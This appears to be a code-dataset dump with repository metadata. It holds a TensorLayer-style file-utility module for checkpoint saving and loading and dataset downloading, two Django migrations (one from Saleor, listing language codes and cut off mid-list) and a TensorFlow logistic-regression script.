b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))
bb = convert((w, h), b)
# out_file.write(str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n')
out_file += str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n'
n_objs += 1
in_file.close()
return n_objs, out_file
logging.info("[VOC] Parsing xml annotations files")
n_objs_list = []
objs_info_list = [] # Darknet Format list of string
objs_info_dicts = {}
for idx, ann_file in enumerate(imgs_ann_file_list):
n_objs, objs_info = convert_annotation(ann_file)
n_objs_list.append(n_objs)
objs_info_list.append(objs_info)
with tf.gfile.GFile(ann_file, 'r') as fid:
xml_str = fid.read()
xml = etree.fromstring(xml_str)
data = _recursive_parse_xml_to_dict(xml)['annotation']
objs_info_dicts.update({imgs_file_list[idx]: data})
return imgs_file_list, imgs_semseg_file_list, imgs_insseg_file_list, imgs_ann_file_list, \
classes, classes_in_person, classes_dict,\
n_objs_list, objs_info_list, objs_info_dicts
def save_npz(save_list=None, name='model.npz', sess=None):
"""Input parameters and the file name, save parameters into .npz file. Use tl.utils.load_npz() to restore.
Parameters
----------
save_list : list of tensor
A list of parameters (tensor) to be saved.
name : str
The name of the `.npz` file.
sess : None or Session
Session may be required in some case.
Examples
--------
Save model to npz
>>> tl.files.save_npz(network.all_params, name='model.npz', sess=sess)
Load model from npz (Method 1)
>>> load_params = tl.files.load_npz(name='model.npz')
>>> tl.files.assign_params(sess, load_params, network)
Load model from npz (Method 2)
>>> tl.files.load_and_assign_npz(sess=sess, name='model.npz', network=network)
Notes
-----
If you got session issues, you can change the value.eval() to value.eval(session=sess)
References
----------
`Saving dictionary using numpy <http://stackoverflow.com/questions/22315595/saving-dictionary-of-header-information-using-numpy-savez>`__
"""
if save_list is None:
save_list = []
save_list_var = []
if sess:
save_list_var = sess.run(save_list)
else:
try:
save_list_var.extend([v.eval() for v in save_list])
except Exception:
logging.info(" Fail to save model, Hint: pass the session into this function, tl.files.save_npz(network.all_params, name='model.npz', sess=sess)")
np.savez(name, params=save_list_var)
save_list_var = None
del save_list_var
logging.info("[*] %s saved" % name)
def load_npz(path='', name='model.npz'):
"""Load the parameters of a Model saved by tl.files.save_npz().
Parameters
----------
path : str
Folder path to `.npz` file.
name : str
The name of the `.npz` file.
Returns
--------
list of array
A list of parameters in order.
Examples
--------
- See ``tl.files.save_npz``
References
----------
- `Saving dictionary using numpy <http://stackoverflow.com/questions/22315595/saving-dictionary-of-header-information-using-numpy-savez>`__
"""
d = np.load(path + name)
return d['params']
def assign_params(sess, params, network):
"""Assign the given parameters to the TensorLayer network.
Parameters
----------
sess : Session
TensorFlow Session.
params : list of array
A list of parameters (array) in order.
network : :class:`Layer`
The network to be assigned.
Returns
--------
list of operations
A list of tf ops in order that assign params. Support sess.run(ops) manually.
Examples
--------
- See ``tl.files.save_npz``
References
----------
- `Assign value to a TensorFlow variable <http://stackoverflow.com/questions/34220532/how-to-assign-value-to-a-tensorflow-variable>`__
"""
ops = []
for idx, param in enumerate(params):
ops.append(network.all_params[idx].assign(param))
if sess is not None:
sess.run(ops)
return ops
def load_and_assign_npz(sess=None, name=None, network=None):
"""Load model from npz and assign to a network.
Parameters
-------------
sess : Session
TensorFlow Session.
name : str
The name of the `.npz` file.
network : :class:`Layer`
The network to be assigned.
Returns
--------
False or network
Returns False, if the model is not exist.
Examples
--------
- See ``tl.files.save_npz``
"""
if network is None:
raise ValueError("network is None.")
if sess is None:
raise ValueError("session is None.")
if not os.path.exists(name):
logging.info("[!] Load {} failed!".format(name))
return False
else:
params = load_npz(name=name)
assign_params(sess, params, network)
logging.info("[*] Load {} SUCCESS!".format(name))
return network
def save_npz_dict(save_list=None, name='model.npz', sess=None):
"""Input parameters and the file name, save parameters as a dictionary into .npz file.
Use ``tl.files.load_and_assign_npz_dict()`` to restore.
Parameters
----------
save_list : list of parameters
A list of parameters (tensor) to be saved.
name : str
The name of the `.npz` file.
sess : Session
TensorFlow Session.
"""
if sess is None:
raise ValueError("session is None.")
if save_list is None:
save_list = []
save_list_names = [tensor.name for tensor in save_list]
save_list_var = sess.run(save_list)
save_var_dict = {save_list_names[idx]: val for idx, val in enumerate(save_list_var)}
np.savez(name, **save_var_dict)
save_list_var = None
save_var_dict = None
del save_list_var
del save_var_dict
logging.info("[*] Model saved in npz_dict %s" % name)
def load_and_assign_npz_dict(name='model.npz', sess=None):
"""Restore the parameters saved by ``tl.files.save_npz_dict()``.
Parameters
----------
name : str
The name of the `.npz` file.
sess : Session
TensorFlow Session.
"""
if sess is None:
raise ValueError("session is None.")
if not os.path.exists(name):
logging.info("[!] Load {} failed!".format(name))
return False
params = np.load(name)
if len(params.keys()) != len(set(params.keys())):
raise Exception("Duplication in model npz_dict %s" % name)
ops = list()
for key in params.keys():
try:
# tensor = tf.get_default_graph().get_tensor_by_name(key)
# varlist = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=key)
varlist = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=key)
if len(varlist) > 1:
raise Exception("[!] Multiple candidate variables to be assigned for name %s" % key)
elif len(varlist) == 0:
raise KeyError
else:
ops.append(varlist[0].assign(params[key]))
logging.info("[*] params restored: %s" % key)
except KeyError:
logging.info("[!] Warning: Tensor named %s not found in network." % key)
sess.run(ops)
logging.info("[*] Model restored from npz_dict %s" % name)
def save_ckpt(sess=None, mode_name='model.ckpt', save_dir='checkpoint', var_list=None, global_step=None, printable=False):
"""Save parameters into `ckpt` file.
Parameters
------------
sess : Session
TensorFlow Session.
mode_name : str
The name of the model, default is ``model.ckpt``.
save_dir : str
The path / file directory to the `ckpt`, default is ``checkpoint``.
var_list : list of tensor
The parameters / variables (tensor) to be saved. If empty, save all global variables (default).
global_step : int or None
Step number.
printable : boolean
Whether to print all parameters information.
See Also
--------
load_ckpt
"""
if sess is None:
raise ValueError("session is None.")
if var_list is None:
var_list = []
ckpt_file = os.path.join(save_dir, mode_name)
if var_list == []:
var_list = tf.global_variables()
logging.info("[*] save %s n_params: %d" % (ckpt_file, len(var_list)))
if printable:
for idx, v in enumerate(var_list):
logging.info(" param {:3}: {:15} {}".format(idx, v.name, str(v.get_shape())))
saver = tf.train.Saver(var_list)
saver.save(sess, ckpt_file, global_step=global_step)
def load_ckpt(sess=None, mode_name='model.ckpt', save_dir='checkpoint', var_list=None, is_latest=True, printable=False):
"""Load parameters from `ckpt` file.
Parameters
------------
sess : Session
TensorFlow Session.
mode_name : str
The name of the model, default is ``model.ckpt``.
save_dir : str
The path / file directory to the `ckpt`, default is ``checkpoint``.
var_list : list of tensor
The parameters / variables (tensor) to be saved. If empty, save all global variables (default).
is_latest : boolean
Whether to load the latest `ckpt`, if False, load the `ckpt` with the name of ```mode_name``.
printable : boolean
Whether to print all parameters information.
Examples
----------
Save all global parameters.
>>> tl.files.save_ckpt(sess=sess, mode_name='model.ckpt', save_dir='model', printable=True)
Save specific parameters.
>>> tl.files.save_ckpt(sess=sess, mode_name='model.ckpt', var_list=net.all_params, save_dir='model', printable=True)
Load latest ckpt.
>>> tl.files.load_ckpt(sess=sess, var_list=net.all_params, save_dir='model', printable=True)
Load specific ckpt.
>>> tl.files.load_ckpt(sess=sess, mode_name='model.ckpt', var_list=net.all_params, save_dir='model', is_latest=False, printable=True)
"""
if sess is None:
raise ValueError("session is None.")
if var_list is None:
var_list = []
if is_latest:
ckpt_file = tf.train.latest_checkpoint(save_dir)
else:
ckpt_file = os.path.join(save_dir, mode_name)
if not var_list:
var_list = tf.global_variables()
logging.info("[*] load %s n_params: %d" % (ckpt_file, len(var_list)))
if printable:
for idx, v in enumerate(var_list):
logging.info(" param {:3}: {:15} {}".format(idx, v.name, str(v.get_shape())))
try:
saver = tf.train.Saver(var_list)
saver.restore(sess, ckpt_file)
except Exception as e:
logging.info(e)
logging.info("[*] load ckpt fail ...")
def save_any_to_npy(save_dict=None, name='file.npy'):
"""Save variables to `.npy` file.
Parameters
------------
save_dict : directory
The variables to be saved.
name : str
File name.
Examples
---------
>>> tl.files.save_any_to_npy(save_dict={'data': ['a','b']}, name='test.npy')
>>> data = tl.files.load_npy_to_any(name='test.npy')
>>> print(data)
... {'data': ['a','b']}
"""
if save_dict is None:
save_dict = {}
np.save(name, save_dict)
def load_npy_to_any(path='', name='file.npy'):
"""Load `.npy` file.
Parameters
------------
path : str
Path to the file (optional).
name : str
File name.
Examples
---------
- see tl.files.save_any_to_npy()
"""
file_path = os.path.join(path, name)
try:
return np.load(file_path).item()
except Exception:
return np.load(file_path)
raise Exception("[!] Fail to load %s" % file_path)
def file_exists(filepath):
"""Check whether a file exists by given file path."""
return os.path.isfile(filepath)
def folder_exists(folderpath):
"""Check whether a folder exists by given folder path."""
return os.path.isdir(folderpath)
def del_file(filepath):
"""Delete a file by given file path."""
os.remove(filepath)
def del_folder(folderpath):
"""Delete a folder by given folder path."""
os.rmdir(folderpath)
def read_file(filepath):
"""Read a file and return a string.
Examples
---------
>>> data = tl.files.read_file('data.txt')
"""
with open(filepath, 'r') as afile:
return afile.read()
def load_file_list(path=None, regx='\.npz', printable=True):
r"""Return a file list in a folder by given a path and regular expression.
Parameters
----------
path : str or None
A folder path, if `None`, use the current directory.
regx : str
The regx of file name.
printable : boolean
Whether to print the files infomation.
Examples
----------
>>> file_list = tl.files.load_file_list(path=None, regx='w1pre_[0-9]+\.(npz)')
"""
if path is None:
path = os.getcwd()
file_list = os.listdir(path)
return_list = []
for _, f in enumerate(file_list):
if re.search(regx, f):
return_list.append(f)
# return_list.sort()
if printable:
logging.info('Match file list = %s' % return_list)
logging.info('Number of files = %d' % len(return_list))
return return_list
def load_folder_list(path=""):
"""Return a folder list in a folder by given a folder path.
Parameters
----------
path : str
A folder path.
"""
return [os.path.join(path, o) for o in os.listdir(path) if os.path.isdir(os.path.join(path, o))]
def exists_or_mkdir(path, verbose=True):
"""Check a folder by given name, if not exist, create the folder and return False,
if directory exists, return True.
Parameters
----------
path : str
A folder path.
verbose : boolean
If True (default), prints results.
Returns
--------
boolean
True if folder already exist, otherwise, returns False and create the folder.
Examples
--------
>>> tl.files.exists_or_mkdir("checkpoints/train")
"""
if not os.path.exists(path):
if verbose:
logging.info("[*] creates %s ..." % path)
os.makedirs(path)
return False
else:
if verbose:
logging.info("[!] %s exists ..." % path)
return True
def maybe_download_and_extract(filename, working_directory, url_source, extract=False, expected_bytes=None):
"""Checks if file exists in working_directory otherwise tries to dowload the file,
and optionally also tries to extract the file if format is ".zip" or ".tar"
Parameters
-----------
filename : str
The name of the (to be) dowloaded file.
working_directory : str
A folder path to search for the file in and dowload the file to
url : str
The URL to download the file from
extract : boolean
If True, tries to uncompress the dowloaded file is ".tar.gz/.tar.bz2" or ".zip" file, default is False.
expected_bytes : int or None
If set tries to verify that the downloaded file is of the specified size, otherwise raises an Exception, defaults is None which corresponds to no check being performed.
Returns
----------
str
File path of the dowloaded (uncompressed) file.
Examples
--------
>>> down_file = tl.files.maybe_download_and_extract(filename='train-images-idx3-ubyte.gz',
... working_directory='data/',
... url_source='http://yann.lecun.com/exdb/mnist/')
>>> tl.files.maybe_download_and_extract(filename='ADEChallengeData2016.zip',
... working_directory='data/',
... url_source='http://sceneparsing.csail.mit.edu/data/',
... extract=True)
"""
# We first define a download function, supporting both Python 2 and 3.
def _download(filename, working_directory, url_source):
def _dlProgress(count, blockSize, totalSize):
if (totalSize != 0):
percent = float(count * blockSize) / float(totalSize) * 100.0
sys.stdout.write("\r" "Downloading " + filename + "...%d%%" % percent)
sys.stdout.flush()
if sys.version_info[0] == 2:
from urllib import urlretrieve
else:
from urllib.request import urlretrieve
filepath = os.path.join(working_directory, filename)
urlretrieve(url_source + filename, filepath, reporthook=_dlProgress)
sys.stdout.write('\n')
exists_or_mkdir(working_directory, verbose=False)
filepath = os.path.join(working_directory, filename)
if not os.path.exists(filepath):
_download(filename, working_directory, url_source)
statinfo = os.stat(filepath)
logging.info('Succesfully downloaded %s %s bytes.' % (filename, statinfo.st_size)) #, 'bytes.')
if (not (expected_bytes is None) and (expected_bytes != statinfo.st_size)):
raise Exception('Failed to verify ' + filename + '. Can you get to it with a browser?')
if (extract):
if tarfile.is_tarfile(filepath):
logging.info('Trying to extract tar file')
tarfile.open(filepath, 'r').extractall(working_directory)
logging.info('... Success!')
elif zipfile.is_zipfile(filepath):
logging.info('Trying to extract zip file')
with zipfile.ZipFile(filepath) as zf:
zf.extractall(working_directory)
logging.info('... Success!')
else:
logging.info("Unknown compression_format only .tar.gz/.tar.bz2/.tar and .zip supported")
return filepath
def natural_keys(text):
"""Sort list of string with number in human order.
Examples
----------
>>> l = ['im1.jpg', 'im31.jpg', 'im11.jpg', 'im21.jpg', 'im03.jpg', 'im05.jpg']
>>> l.sort(key=tl.files.natural_keys)
... ['im1.jpg', 'im03.jpg', 'im05', 'im11.jpg', 'im21.jpg', 'im31.jpg']
>>> l.sort() # that is what we dont want
... ['im03.jpg', 'im05', 'im1.jpg', 'im11.jpg', 'im21.jpg', 'im31.jpg']
References
----------
- `link <http://nedbatchelder.com/blog/200712/human_sorting.html>`__
"""
# - alist.sort(key=natural_keys) sorts in human order
# http://nedbatchelder.com/blog/200712/human_sorting.html
# (See Toothy's implementation in the comments)
def atoi(text):
return int(text) if text.isdigit() else text
return [atoi(c) for c in re.split('(\d+)', text)]
# Visualizing npz files
def npz_to_W_pdf(path=None, regx='w1pre_[0-9]+\.(npz)'):
r"""Convert the first weight matrix of `.npz` file to `.pdf` by using `tl.visualize.W()`.
Parameters
----------
path : str
A folder path to `npz` files.
regx : str
Regx for the file name.
Examples
---------
Convert the first weight matrix of w1_pre...npz file to w1_pre...pdf.
>>> tl.files.npz_to_W_pdf(path='/Users/.../npz_file/', regx='w1pre_[0-9]+\.(npz)')
"""
file_list = load_file_list(path=path, regx=regx)
for f in file_list:
W = load_npz(path, f)[0]
logging.info("%s --> %s" % (f, f.split('.')[0] + '.pdf'))
visualize.draw_weights(W, second=10, saveable=True, name=f.split('.')[0], fig_idx=2012)
| [
"[email protected]"
] | |
7ba4b6660a56236839281e9a6a45e1423b62ebcc | 4de2a833df412e1609b9894c0cb809c4d70f8623 | /app/news/migrations/0002_auto_20180313_1540.py | 75c1430513d4b94067c753c0594020aecc4e7186 | [] | no_license | Isaias301/e-commerce | 06ea11238403b7fa70c5c8e387253441d0dd07f4 | e00f94406c432751adfa03556ecfe154ec222fd9 | refs/heads/master | 2021-04-09T10:34:23.399915 | 2018-03-16T00:33:43 | 2018-03-16T00:33:43 | 125,439,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2018-03-13 18:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Teste',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
],
),
migrations.RemoveField(
model_name='article',
name='reporter',
),
migrations.DeleteModel(
name='Article',
),
migrations.DeleteModel(
name='Reporter',
),
]
| [
"[email protected]"
] | |
7c7d39ff26b769153bb74f24a416d86ba8a0eaa3 | d0f4327ca33aa37e976b024ddfbd6361fdf1a8ee | /LogisticRegression.py | 1747d6347b97ed0cc2ae5c1f114f1c197b1a7726 | [] | no_license | MitsuruFujiwara/TensorFlowTraining | c5f828356ea93c868f16ea67335dd4f32b1c7040 | 3a391c849699bd8332c23ddfffb773cf3050c69c | refs/heads/master | 2021-01-17T17:48:21.340414 | 2016-07-24T13:05:53 | 2016-07-24T13:05:53 | 60,701,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,291 | py | # -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import tensorflow as tf
from RegressionBase import RegressionBase
class LogisticRegression(RegressionBase):
def __init__(self, trX, trY, numStep, numParameter, learning_rate):
RegressionBase.__init__(self, trX, trY, numStep, numParameter, learning_rate)
def training(self, loss):
return tf.train.AdagradOptimizer(self.learning_rate).minimize(loss)
def loss(self, output, supervisor_labels_placeholder):
x_entropy = tf.nn.sigmoid_cross_entropy_with_logits(output, supervisor_labels_placeholder, name = 'xentropy')
return tf.reduce_mean(x_entropy, name = 'xentropy_mean')
if __name__ == '__main__':
data = pd.read_csv('test_data.csv')
trX = data[[\
'X1', 'X2', 'X3', 'X4', 'X5', 'X6', 'X7', 'X8', 'X9','X10', 'X11', 'X12',\
'X13', 'X14', 'X15', 'X16', 'X17', 'X18', 'X19', 'X20', 'X21','X22', 'X23',\
'X24', 'X25', 'X26', 'X27'\
]].fillna(0)
trY = data['Y']
numStep = 10000
numParameter = len(trX.columns)
learning_rate = 0.5
r = LogisticRegression(trX, trY, numStep, numParameter, learning_rate)
r.run()
# loss = 0.282286
# b = -6.56112
# W0 = 0.226928
# W1 = 0.238033
# W2 = -0.0118023
# W3 = 0.499244
| [
"[email protected]"
] | |
dc3b3885ca9501fe86d36963da993632c7abb1cf | 3a533d1503f9a1c767ecd3a29885add49fff4f18 | /saleor/order/migrations/0114_alter_order_language_code.py | 2a11cde671ec67e4f55975abffa65b13ea276bfa | [
"BSD-3-Clause"
] | permissive | jonserna/saleor | 0c1e4297e10e0a0ce530b5296f6b4488f524c145 | b7d1b320e096d99567d3fa7bc4780862809d19ac | refs/heads/master | 2023-06-25T17:25:17.459739 | 2023-06-19T14:05:41 | 2023-06-19T14:05:41 | 186,167,599 | 0 | 0 | BSD-3-Clause | 2019-12-29T15:46:40 | 2019-05-11T18:21:31 | TypeScript | UTF-8 | Python | false | false | 40,331 | py | # Generated by Django 3.2.6 on 2021-08-17 11:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("order", "0113_orderevent_app"),
]
operations = [
migrations.AlterField(
model_name="order",
name="language_code",
field=models.CharField(
choices=[
("af", "Afrikaans"),
("af-NA", "Afrikaans (Namibia)"),
("af-ZA", "Afrikaans (South Africa)"),
("agq", "Aghem"),
("agq-CM", "Aghem (Cameroon)"),
("ak", "Akan"),
("ak-GH", "Akan (Ghana)"),
("am", "Amharic"),
("am-ET", "Amharic (Ethiopia)"),
("ar", "Arabic"),
("ar-AE", "Arabic (United Arab Emirates)"),
("ar-BH", "Arabic (Bahrain)"),
("ar-DJ", "Arabic (Djibouti)"),
("ar-DZ", "Arabic (Algeria)"),
("ar-EG", "Arabic (Egypt)"),
("ar-EH", "Arabic (Western Sahara)"),
("ar-ER", "Arabic (Eritrea)"),
("ar-IL", "Arabic (Israel)"),
("ar-IQ", "Arabic (Iraq)"),
("ar-JO", "Arabic (Jordan)"),
("ar-KM", "Arabic (Comoros)"),
("ar-KW", "Arabic (Kuwait)"),
("ar-LB", "Arabic (Lebanon)"),
("ar-LY", "Arabic (Libya)"),
("ar-MA", "Arabic (Morocco)"),
("ar-MR", "Arabic (Mauritania)"),
("ar-OM", "Arabic (Oman)"),
("ar-PS", "Arabic (Palestinian Territories)"),
("ar-QA", "Arabic (Qatar)"),
("ar-SA", "Arabic (Saudi Arabia)"),
("ar-SD", "Arabic (Sudan)"),
("ar-SO", "Arabic (Somalia)"),
("ar-SS", "Arabic (South Sudan)"),
("ar-SY", "Arabic (Syria)"),
("ar-TD", "Arabic (Chad)"),
("ar-TN", "Arabic (Tunisia)"),
("ar-YE", "Arabic (Yemen)"),
("as", "Assamese"),
("as-IN", "Assamese (India)"),
("asa", "Asu"),
("asa-TZ", "Asu (Tanzania)"),
("ast", "Asturian"),
("ast-ES", "Asturian (Spain)"),
("az", "Azerbaijani"),
("az-Cyrl", "Azerbaijani (Cyrillic)"),
("az-Cyrl-AZ", "Azerbaijani (Cyrillic, Azerbaijan)"),
("az-Latn", "Azerbaijani (Latin)"),
("az-Latn-AZ", "Azerbaijani (Latin, Azerbaijan)"),
("bas", "Basaa"),
("bas-CM", "Basaa (Cameroon)"),
("be", "Belarusian"),
("be-BY", "Belarusian (Belarus)"),
("bem", "Bemba"),
("bem-ZM", "Bemba (Zambia)"),
("bez", "Bena"),
("bez-TZ", "Bena (Tanzania)"),
("bg", "Bulgarian"),
("bg-BG", "Bulgarian (Bulgaria)"),
("bm", "Bambara"),
("bm-ML", "Bambara (Mali)"),
("bn", "Bangla"),
("bn-BD", "Bangla (Bangladesh)"),
("bn-IN", "Bangla (India)"),
("bo", "Tibetan"),
("bo-CN", "Tibetan (China)"),
("bo-IN", "Tibetan (India)"),
("br", "Breton"),
("br-FR", "Breton (France)"),
("brx", "Bodo"),
("brx-IN", "Bodo (India)"),
("bs", "Bosnian"),
("bs-Cyrl", "Bosnian (Cyrillic)"),
("bs-Cyrl-BA", "Bosnian (Cyrillic, Bosnia & Herzegovina)"),
("bs-Latn", "Bosnian (Latin)"),
("bs-Latn-BA", "Bosnian (Latin, Bosnia & Herzegovina)"),
("ca", "Catalan"),
("ca-AD", "Catalan (Andorra)"),
("ca-ES", "Catalan (Spain)"),
("ca-ES-VALENCIA", "Catalan (Spain, Valencian)"),
("ca-FR", "Catalan (France)"),
("ca-IT", "Catalan (Italy)"),
("ccp", "Chakma"),
("ccp-BD", "Chakma (Bangladesh)"),
("ccp-IN", "Chakma (India)"),
("ce", "Chechen"),
("ce-RU", "Chechen (Russia)"),
("ceb", "Cebuano"),
("ceb-PH", "Cebuano (Philippines)"),
("cgg", "Chiga"),
("cgg-UG", "Chiga (Uganda)"),
("chr", "Cherokee"),
("chr-US", "Cherokee (United States)"),
("ckb", "Central Kurdish"),
("ckb-IQ", "Central Kurdish (Iraq)"),
("ckb-IR", "Central Kurdish (Iran)"),
("cs", "Czech"),
("cs-CZ", "Czech (Czechia)"),
("cu", "Church Slavic"),
("cu-RU", "Church Slavic (Russia)"),
("cy", "Welsh"),
("cy-GB", "Welsh (United Kingdom)"),
("da", "Danish"),
("da-DK", "Danish (Denmark)"),
("da-GL", "Danish (Greenland)"),
("dav", "Taita"),
("dav-KE", "Taita (Kenya)"),
("de", "German"),
("de-AT", "German (Austria)"),
("de-BE", "German (Belgium)"),
("de-CH", "German (Switzerland)"),
("de-DE", "German (Germany)"),
("de-IT", "German (Italy)"),
("de-LI", "German (Liechtenstein)"),
("de-LU", "German (Luxembourg)"),
("dje", "Zarma"),
("dje-NE", "Zarma (Niger)"),
("dsb", "Lower Sorbian"),
("dsb-DE", "Lower Sorbian (Germany)"),
("dua", "Duala"),
("dua-CM", "Duala (Cameroon)"),
("dyo", "Jola-Fonyi"),
("dyo-SN", "Jola-Fonyi (Senegal)"),
("dz", "Dzongkha"),
("dz-BT", "Dzongkha (Bhutan)"),
("ebu", "Embu"),
("ebu-KE", "Embu (Kenya)"),
("ee", "Ewe"),
("ee-GH", "Ewe (Ghana)"),
("ee-TG", "Ewe (Togo)"),
("el", "Greek"),
("el-CY", "Greek (Cyprus)"),
("el-GR", "Greek (Greece)"),
("en", "English"),
("en-AE", "English (United Arab Emirates)"),
("en-AG", "English (Antigua & Barbuda)"),
("en-AI", "English (Anguilla)"),
("en-AS", "English (American Samoa)"),
("en-AT", "English (Austria)"),
("en-AU", "English (Australia)"),
("en-BB", "English (Barbados)"),
("en-BE", "English (Belgium)"),
("en-BI", "English (Burundi)"),
("en-BM", "English (Bermuda)"),
("en-BS", "English (Bahamas)"),
("en-BW", "English (Botswana)"),
("en-BZ", "English (Belize)"),
("en-CA", "English (Canada)"),
("en-CC", "English (Cocos (Keeling) Islands)"),
("en-CH", "English (Switzerland)"),
("en-CK", "English (Cook Islands)"),
("en-CM", "English (Cameroon)"),
("en-CX", "English (Christmas Island)"),
("en-CY", "English (Cyprus)"),
("en-DE", "English (Germany)"),
("en-DG", "English (Diego Garcia)"),
("en-DK", "English (Denmark)"),
("en-DM", "English (Dominica)"),
("en-ER", "English (Eritrea)"),
("en-FI", "English (Finland)"),
("en-FJ", "English (Fiji)"),
("en-FK", "English (Falkland Islands)"),
("en-FM", "English (Micronesia)"),
("en-GB", "English (United Kingdom)"),
("en-GD", "English (Grenada)"),
("en-GG", "English (Guernsey)"),
("en-GH", "English (Ghana)"),
("en-GI", "English (Gibraltar)"),
("en-GM", "English (Gambia)"),
("en-GU", "English (Guam)"),
("en-GY", "English (Guyana)"),
("en-HK", "English (Hong Kong SAR China)"),
("en-IE", "English (Ireland)"),
("en-IL", "English (Israel)"),
("en-IM", "English (Isle of Man)"),
("en-IN", "English (India)"),
("en-IO", "English (British Indian Ocean Territory)"),
("en-JE", "English (Jersey)"),
("en-JM", "English (Jamaica)"),
("en-KE", "English (Kenya)"),
("en-KI", "English (Kiribati)"),
("en-KN", "English (St. Kitts & Nevis)"),
("en-KY", "English (Cayman Islands)"),
("en-LC", "English (St. Lucia)"),
("en-LR", "English (Liberia)"),
("en-LS", "English (Lesotho)"),
("en-MG", "English (Madagascar)"),
("en-MH", "English (Marshall Islands)"),
("en-MO", "English (Macao SAR China)"),
("en-MP", "English (Northern Mariana Islands)"),
("en-MS", "English (Montserrat)"),
("en-MT", "English (Malta)"),
("en-MU", "English (Mauritius)"),
("en-MW", "English (Malawi)"),
("en-MY", "English (Malaysia)"),
("en-NA", "English (Namibia)"),
("en-NF", "English (Norfolk Island)"),
("en-NG", "English (Nigeria)"),
("en-NL", "English (Netherlands)"),
("en-NR", "English (Nauru)"),
("en-NU", "English (Niue)"),
("en-NZ", "English (New Zealand)"),
("en-PG", "English (Papua New Guinea)"),
("en-PH", "English (Philippines)"),
("en-PK", "English (Pakistan)"),
("en-PN", "English (Pitcairn Islands)"),
("en-PR", "English (Puerto Rico)"),
("en-PW", "English (Palau)"),
("en-RW", "English (Rwanda)"),
("en-SB", "English (Solomon Islands)"),
("en-SC", "English (Seychelles)"),
("en-SD", "English (Sudan)"),
("en-SE", "English (Sweden)"),
("en-SG", "English (Singapore)"),
("en-SH", "English (St. Helena)"),
("en-SI", "English (Slovenia)"),
("en-SL", "English (Sierra Leone)"),
("en-SS", "English (South Sudan)"),
("en-SX", "English (Sint Maarten)"),
("en-SZ", "English (Eswatini)"),
("en-TC", "English (Turks & Caicos Islands)"),
("en-TK", "English (Tokelau)"),
("en-TO", "English (Tonga)"),
("en-TT", "English (Trinidad & Tobago)"),
("en-TV", "English (Tuvalu)"),
("en-TZ", "English (Tanzania)"),
("en-UG", "English (Uganda)"),
("en-UM", "English (U.S. Outlying Islands)"),
("en-US", "English (United States)"),
("en-VC", "English (St. Vincent & Grenadines)"),
("en-VG", "English (British Virgin Islands)"),
("en-VI", "English (U.S. Virgin Islands)"),
("en-VU", "English (Vanuatu)"),
("en-WS", "English (Samoa)"),
("en-ZA", "English (South Africa)"),
("en-ZM", "English (Zambia)"),
("en-ZW", "English (Zimbabwe)"),
("eo", "Esperanto"),
("es", "Spanish"),
("es-AR", "Spanish (Argentina)"),
("es-BO", "Spanish (Bolivia)"),
("es-BR", "Spanish (Brazil)"),
("es-BZ", "Spanish (Belize)"),
("es-CL", "Spanish (Chile)"),
("es-CO", "Spanish (Colombia)"),
("es-CR", "Spanish (Costa Rica)"),
("es-CU", "Spanish (Cuba)"),
("es-DO", "Spanish (Dominican Republic)"),
("es-EA", "Spanish (Ceuta & Melilla)"),
("es-EC", "Spanish (Ecuador)"),
("es-ES", "Spanish (Spain)"),
("es-GQ", "Spanish (Equatorial Guinea)"),
("es-GT", "Spanish (Guatemala)"),
("es-HN", "Spanish (Honduras)"),
("es-IC", "Spanish (Canary Islands)"),
("es-MX", "Spanish (Mexico)"),
("es-NI", "Spanish (Nicaragua)"),
("es-PA", "Spanish (Panama)"),
("es-PE", "Spanish (Peru)"),
("es-PH", "Spanish (Philippines)"),
("es-PR", "Spanish (Puerto Rico)"),
("es-PY", "Spanish (Paraguay)"),
("es-SV", "Spanish (El Salvador)"),
("es-US", "Spanish (United States)"),
("es-UY", "Spanish (Uruguay)"),
("es-VE", "Spanish (Venezuela)"),
("et", "Estonian"),
("et-EE", "Estonian (Estonia)"),
("eu", "Basque"),
("eu-ES", "Basque (Spain)"),
("ewo", "Ewondo"),
("ewo-CM", "Ewondo (Cameroon)"),
("fa", "Persian"),
("fa-AF", "Persian (Afghanistan)"),
("fa-IR", "Persian (Iran)"),
("ff", "Fulah"),
("ff-Adlm", "Fulah (Adlam)"),
("ff-Adlm-BF", "Fulah (Adlam, Burkina Faso)"),
("ff-Adlm-CM", "Fulah (Adlam, Cameroon)"),
("ff-Adlm-GH", "Fulah (Adlam, Ghana)"),
("ff-Adlm-GM", "Fulah (Adlam, Gambia)"),
("ff-Adlm-GN", "Fulah (Adlam, Guinea)"),
("ff-Adlm-GW", "Fulah (Adlam, Guinea-Bissau)"),
("ff-Adlm-LR", "Fulah (Adlam, Liberia)"),
("ff-Adlm-MR", "Fulah (Adlam, Mauritania)"),
("ff-Adlm-NE", "Fulah (Adlam, Niger)"),
("ff-Adlm-NG", "Fulah (Adlam, Nigeria)"),
("ff-Adlm-SL", "Fulah (Adlam, Sierra Leone)"),
("ff-Adlm-SN", "Fulah (Adlam, Senegal)"),
("ff-Latn", "Fulah (Latin)"),
("ff-Latn-BF", "Fulah (Latin, Burkina Faso)"),
("ff-Latn-CM", "Fulah (Latin, Cameroon)"),
("ff-Latn-GH", "Fulah (Latin, Ghana)"),
("ff-Latn-GM", "Fulah (Latin, Gambia)"),
("ff-Latn-GN", "Fulah (Latin, Guinea)"),
("ff-Latn-GW", "Fulah (Latin, Guinea-Bissau)"),
("ff-Latn-LR", "Fulah (Latin, Liberia)"),
("ff-Latn-MR", "Fulah (Latin, Mauritania)"),
("ff-Latn-NE", "Fulah (Latin, Niger)"),
("ff-Latn-NG", "Fulah (Latin, Nigeria)"),
("ff-Latn-SL", "Fulah (Latin, Sierra Leone)"),
